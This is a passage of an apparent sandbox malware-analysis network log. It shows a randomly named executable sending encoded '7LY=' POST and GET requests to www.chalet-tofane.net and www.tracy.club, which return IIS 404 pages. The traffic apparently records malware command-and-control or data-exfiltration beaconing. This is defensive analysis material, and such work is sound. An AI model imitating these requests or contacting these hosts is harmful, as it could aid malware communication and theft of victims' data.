                                              Sep 24, 2024 11:28:55.308593988 CEST1289INData Raw: 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:28:55.308656931 CEST1289INData Raw: 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:28:55.308684111 CEST16INData Raw: 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                              Data Ascii: body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.11.304993262.149.128.40804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:57.841571093 CEST2578OUTPOST /ytc6/ HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.chalet-tofane.net
                                              Referer: http://www.chalet-tofane.net/ytc6/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 63 61 76 2b 69 30 5a 70 39 77 62 71 47 5a 76 79 4c 46 42 42 5a 69 41 4c 74 77 73 41 45 65 6c 45 54 57 45 42 78 37 56 4c 42 6e 6c 49 4d 6f 73 62 53 51 4a 56 6b 2b 37 2b 69 45 33 62 7a 49 54 2b 6e 4f 58 43 47 74 6f 32 5a 48 6b 73 58 34 2f 39 7a 57 49 45 78 71 36 50 66 32 4d 68 63 41 62 78 36 42 65 4b 4d 79 41 46 4a 39 30 62 47 52 6e 54 4d 65 32 57 74 65 36 6b 44 35 55 68 6b 68 31 68 31 4c 50 61 36 57 67 68 34 41 57 37 56 62 64 53 69 57 65 64 42 30 31 34 47 35 45 44 64 32 72 71 69 6b 30 38 6b 2b 66 53 51 70 48 38 66 56 36 55 6a 68 41 61 6f 69 53 74 71 56 71 77 73 43 77 6a 4f 78 41 61 78 75 45 37 38 48 48 7a 77 56 7a 6c 6f 42 4d 38 39 56 63 45 35 4e 51 77 71 4d 72 61 56 7a 2b 77 38 57 5a 44 6b 6f 6d 73 50 56 7a 6d 45 73 31 74 4f 6f 4c 4d 34 61 59 46 71 54 54 70 33 2b 58 78 59 71 37 75 4b 4e 38 4b 51 58 54 31 4c 57 73 44 63 43 71 69 38 6f 44 4d 41 68 70 73 50 49 51 76 4a 62 38 69 35 67 49 37 71 78 6b 4d 48 64 5a 6b 52 39 48 41 46 6f 56 75 72 61 76 30 45 4c 73 6f 51 76 75 6c 6d 48 55 47 71 47 [TRUNCATED]
                                              Data Ascii: 7LY=cav+i0Zp9wbqGZvyLFBBZiALtwsAEelETWEBx7VLBnlIMosbSQJVk+7+iE3bzIT+nOXCGto2ZHksX4/9zWIExq6Pf2MhcAbx6BeKMyAFJ90bGRnTMe2Wte6kD5Uhkh1h1LPa6Wgh4AW7VbdSiWedB014G5EDd2rqik08k+fSQpH8fV6UjhAaoiStqVqwsCwjOxAaxuE78HHzwVzloBM89VcE5NQwqMraVz+w8WZDkomsPVzmEs1tOoLM4aYFqTTp3+XxYq7uKN8KQXT1LWsDcCqi8oDMAhpsPIQvJb8i5gI7qxkMHdZkR9HAFoVurav0ELsoQvulmHUGqGXd4Gme93dDCb6Z4Uj9QtF3mYBv8mmZamzPD8bi4jWSSbJM6WVW2kzhqAZYvgV1/eJhuo4fzBN427LY8KOr2qKEI3Vbx/HVUmq8eoL0LUKupt2buU9ULmRfxYh8thm9RC2s3gHqsxcuzj07Bt1ML5crKjDoF8zBBQFmOtSj2umOorPE8DHgX7LhID0PhLmobG9YyYqVPcTjRU3poW6nQJ4hebfSMdihIkvAn0D25SVURKXWhl7dpzW7LmLjQW9FptHoJwjqfoLf/JvwyEmIOnTfl09x2/0IJfm3jEkkONj3p/bVdlhhi2bFX2UiyQaGxq7PGYMc+1SZER0zKFuDmQdMrs/eNYqJFTnkoqqSHwwopYFb9hcQVyoV9sQu4mjNp36E2Q9pda9qSXODHpV8HmfgSfALIv40We5rfCbdFQ0Jh4kGiMDvepTVEpx2+3XV8BaDbKOHR2x7MjTIhLAW53LTPXbubWnVs1MkM0Dn98R56mVBSl7zDUNh4WKC0f4JV3vHJr//cF/xAg50fIo5ZnWFR+bZoCI/4S7nUO/dkHS/9Cti3upSTT1I+i3vsJYM3WRLHRFSMp/kIweowSynBn+31guttP2Mz+T+p8HfuRDKIDTtq4aayByzzmwIjyhi4ucigHgflkW9rAhYvkOjsJhiii2Sk07gsOMj [TRUNCATED]
                                              Sep 24, 2024 11:28:57.841588974 CEST1335OUTData Raw: 78 53 54 6d 58 74 46 6a 64 68 74 6f 6c 2b 43 49 74 79 77 2f 44 72 52 44 7a 4f 66 36 49 72 4f 63 70 55 5a 5a 4e 56 42 50 30 43 45 33 78 4c 34 33 57 70 6a 4c 7a 62 44 41 6a 38 74 52 6a 45 76 55 4a 5a 31 36 6b 32 42 33 2b 34 71 6e 53 6f 6d 34 30 61
                                              Data Ascii: xSTmXtFjdhtol+CItyw/DrRDzOf6IrOcpUZZNVBP0CE3xL43WpjLzbDAj8tRjEvUJZ16k2B3+4qnSom40aso3JuoxYsf7pn2DebGHUU8PmbB2S9/FklEvqOuI++9e7xP/TBdEpk0L9tHIhuDRKJXyldLzH+aqnUYrf+L8eyMePORrCpy/eQiWCQh6ngS2XhCNlseMXdBdqe5Hqx23oLvM0t/KhWKJ3+/jQfaSlIWFCDWJVn3aiS
                                              Sep 24, 2024 11:28:58.047177076 CEST1289INHTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:57 GMT
                                              Connection: close
                                              Content-Length: 4953
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:28:58.047204971 CEST1289INData Raw: 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:28:58.047282934 CEST1289INData Raw: 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:28:58.047295094 CEST1289INData Raw: 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:28:58.047378063 CEST16INData Raw: 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                              Data Ascii: body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.11.304993362.149.128.40804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:00.588927031 CEST497OUTGET /ytc6/?Nze=C0klVT&7LY=RYHehDtD4gH3OO31IF1CMhco/TkeBNw6MFMBy+BdKXE5DZh4a3B2rurujEnG5bf1mvjABP5LZTRjcv/BkHIagK+kDFYsdgHg6BKHRShVUN8HZR3SFfvrnus= HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:00.796921968 CEST1289INHTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:59 GMT
                                              Connection: close
                                              Content-Length: 5093
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:29:00.797023058 CEST1289INData Raw: 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:29:00.797038078 CEST1289INData Raw: 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:29:00.797051907 CEST1289INData Raw: 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:29:00.797074080 CEST156INData Raw: 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 31 37 37 36 33 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61
                                              Data Ascii: .com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.11.30499343.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:06.039757013 CEST755OUTPOST /clto/ HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.tracy.club
                                              Referer: http://www.tracy.club/clto/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 64 72 64 33 63 31 55 79 38 73 2b 30 41 4a 76 58 54 39 38 64 63 63 38 4e 4d 65 45 75 38 4e 34 58 36 45 74 42 37 53 34 34 37 56 4e 4c 65 51 77 54 39 44 4c 58 66 37 55 2f 46 58 70 31 75 6c 72 71 58 34 79 53 49 37 45 58 64 34 62 66 4e 6c 66 77 6c 64 36 4b 35 77 68 58 79 69 38 51 77 6a 42 52 4d 33 73 4d 73 65 72 30 6d 63 75 32 6e 57 67 4e 72 36 42 47 71 47 5a 56 65 59 2b 51 7a 55 57 6f 36 70 2b 34 63 4e 41 6c 6b 5a 44 76 39 7a 44 35 75 56 68 70 66 54 33 37 58 44 47 73 63 41 62 72 51 38 62 4b 39 30 41 5a 76 4b 37 37 5a 7a 56 48 4c 42 6f 39 2b 34 56 72 4f 66 64 4a 66 56 78 41 73 51 3d 3d
                                              Data Ascii: 7LY=drd3c1Uy8s+0AJvXT98dcc8NMeEu8N4X6EtB7S447VNLeQwT9DLXf7U/FXp1ulrqX4ySI7EXd4bfNlfwld6K5whXyi8QwjBRM3sMser0mcu2nWgNr6BGqGZVeY+QzUWo6p+4cNAlkZDv9zD5uVhpfT37XDGscAbrQ8bK90AZvK77ZzVHLBo9+4VrOfdJfVxAsQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.11.30499353.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:08.673413038 CEST775OUTPOST /clto/ HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.tracy.club
                                              Referer: http://www.tracy.club/clto/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 64 72 64 33 63 31 55 79 38 73 2b 30 42 70 2f 58 44 71 49 64 61 38 38 4f 51 4f 45 75 75 4e 34 54 36 45 78 42 37 54 4e 6a 37 6a 39 4c 65 31 30 54 76 53 4c 58 63 37 55 2f 50 33 6f 39 6a 46 72 6c 58 34 32 61 49 2b 38 58 64 34 66 66 4e 68 62 77 6b 75 43 4e 34 67 68 56 36 43 38 53 75 54 42 52 4d 33 73 4d 73 64 58 4f 6d 64 4b 32 6b 6e 77 4e 70 65 64 42 6e 6d 5a 61 64 59 2b 51 6b 45 57 73 36 70 2b 57 63 4d 63 44 6b 61 37 76 39 33 50 35 75 48 45 2f 49 44 33 35 49 7a 48 37 4d 44 4c 37 49 49 2f 38 30 30 6f 38 76 72 7a 5a 63 6b 6b 64 57 43 63 2f 74 59 70 47 53 65 77 68 64 58 77 62 78 5a 68 75 61 58 57 70 6e 70 63 65 76 64 2b 75 74 2f 31 7a 38 70 67 3d
                                              Data Ascii: 7LY=drd3c1Uy8s+0Bp/XDqIda88OQOEuuN4T6ExB7TNj7j9Le10TvSLXc7U/P3o9jFrlX42aI+8Xd4ffNhbwkuCN4ghV6C8SuTBRM3sMsdXOmdK2knwNpedBnmZadY+QkEWs6p+WcMcDka7v93P5uHE/ID35IzH7MDL7II/800o8vrzZckkdWCc/tYpGSewhdXwbxZhuaXWpnpcevd+ut/1z8pg=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.11.30499363.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:11.312988043 CEST2578OUTPOST /clto/ HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.tracy.club
                                              Referer: http://www.tracy.club/clto/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 64 72 64 33 63 31 55 79 38 73 2b 30 42 70 2f 58 44 71 49 64 61 38 38 4f 51 4f 45 75 75 4e 34 54 36 45 78 42 37 54 4e 6a 37 6a 31 4c 66 48 38 54 39 68 7a 58 64 37 55 2f 52 6e 6f 38 6a 46 72 38 58 38 61 57 49 2b 41 68 64 36 33 66 4d 43 54 77 73 2f 43 4e 32 67 68 56 6c 53 38 54 77 6a 42 41 4d 33 38 79 73 65 76 4f 6d 64 4b 32 6b 6b 34 4e 36 71 42 42 30 57 5a 56 65 59 2f 66 7a 55 57 45 36 70 6d 67 63 4d 59 31 6b 5a 4c 76 39 47 66 35 76 30 67 2f 49 44 33 35 51 44 48 36 4d 44 48 76 49 4d 53 37 30 31 78 65 6f 61 58 5a 64 79 67 65 47 52 38 6f 34 35 5a 4d 64 50 41 44 55 52 6b 53 34 34 68 7a 55 68 4f 59 78 39 63 41 72 70 4f 30 33 61 39 47 74 65 50 4b 64 65 5a 6b 73 73 49 7a 4a 5a 76 63 61 62 39 56 65 46 46 4a 74 71 59 78 71 51 47 71 54 4b 44 4b 48 68 33 30 78 6e 70 44 6b 36 71 68 33 34 52 54 65 73 59 54 4b 30 43 51 55 64 48 4d 45 77 79 52 6e 55 45 69 46 4c 45 58 68 4f 58 2b 68 75 62 48 70 6f 7a 33 67 2b 76 72 36 4f 50 74 5a 4b 78 33 77 55 4b 75 78 59 57 6a 4c 41 58 46 6d 4c 38 51 34 64 6b 35 2f 68 [TRUNCATED]
                                              Data Ascii: 7LY=drd3c1Uy8s+0Bp/XDqIda88OQOEuuN4T6ExB7TNj7j1LfH8T9hzXd7U/Rno8jFr8X8aWI+Ahd63fMCTws/CN2ghVlS8TwjBAM38ysevOmdK2kk4N6qBB0WZVeY/fzUWE6pmgcMY1kZLv9Gf5v0g/ID35QDH6MDHvIMS701xeoaXZdygeGR8o45ZMdPADURkS44hzUhOYx9cArpO03a9GtePKdeZkssIzJZvcab9VeFFJtqYxqQGqTKDKHh30xnpDk6qh34RTesYTK0CQUdHMEwyRnUEiFLEXhOX+hubHpoz3g+vr6OPtZKx3wUKuxYWjLAXFmL8Q4dk5/hkPhKhaDf64DdQLh4lYspTgyA6ltSXTTsY1CeCL+EV16ofQaLySbBQ/Mx1uEYKimirNpo9gRptT99qtOZ2CPdcopGHFYbg5eRS6oVqSj1FDO4d0HE+2X7NUzHc+3phgWX7huZIfBtfGpZc1dZh08ON7M53oxgHUpKe9lJ3P6vTwTgz4SounrSwF9VrNLNqYuoWz6u9cASpXXcWVAhTrFlKiGlC+4YiUYi6tFVWRIcADdL+CWUTmviN4fBshLH8N80XNwNYQlhaZcRkDDvoD+wHEgHmnCM5GpqXsOUQwbsXFAea1Yb3j1tmWDTwouh2qBi7R3ijQfXp/JrFEE0uRzbpN1uf+nN9jW96rLdZrCOPQDbtArfTfUwgZCamIz9TNjynBR/ry0mUd3kABca7bRHoJxs/ldFyyI3tbt6BRdoWjz1qz6ytvHygBdPLOF/RFKxI6pboizHQmUVcjrDKdoew159fAU80hFVKNHvgEjEX2QTVbV1ttN/8SWVW+XKC++4K7oo5ttzZpbacMuVei6Du3POaF/eYMkXO7gx91xM3L9rPx/NMdliIoT58Srl+4GJWvTDGArr7V50Qvl3ytHHz9uJgKGit0KcvhBJyy6GMCrtfUJc2b5er4jyyPMUwGiWhybfwsju5eq+K3y4gt+BgxZBmZRWuEXdYA [TRUNCATED]
                                              Sep 24, 2024 11:29:11.313014984 CEST1314OUTData Raw: 51 41 57 38 79 4d 51 6b 35 77 37 42 75 68 58 45 66 53 42 67 64 6a 6d 32 43 71 47 34 68 71 32 38 78 35 30 73 66 58 57 6d 5a 44 36 47 56 2b 4a 32 51 35 43 59 44 4d 74 63 6a 68 52 55 71 76 39 39 4a 4b 42 52 56 31 37 62 69 4f 74 32 63 6e 36 30 33 6d
                                              Data Ascii: QAW8yMQk5w7BuhXEfSBgdjm2CqG4hq28x50sfXWmZD6GV+J2Q5CYDMtcjhRUqv99JKBRV17biOt2cn603m64BmjnRCQoSO+JltOeX57UmnHdKD1TscKYUUhIVdXnSTwU5L4gB00+7KMSRmxemyW/dxKCSey6rH3rEgRDD17fIAawyGMHZPb5vox2G2aaRzQlBO0OClqx5/Nw0mOd456DadzOxnUzPQnMv0zFSBfmpzHFL86XF5w


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
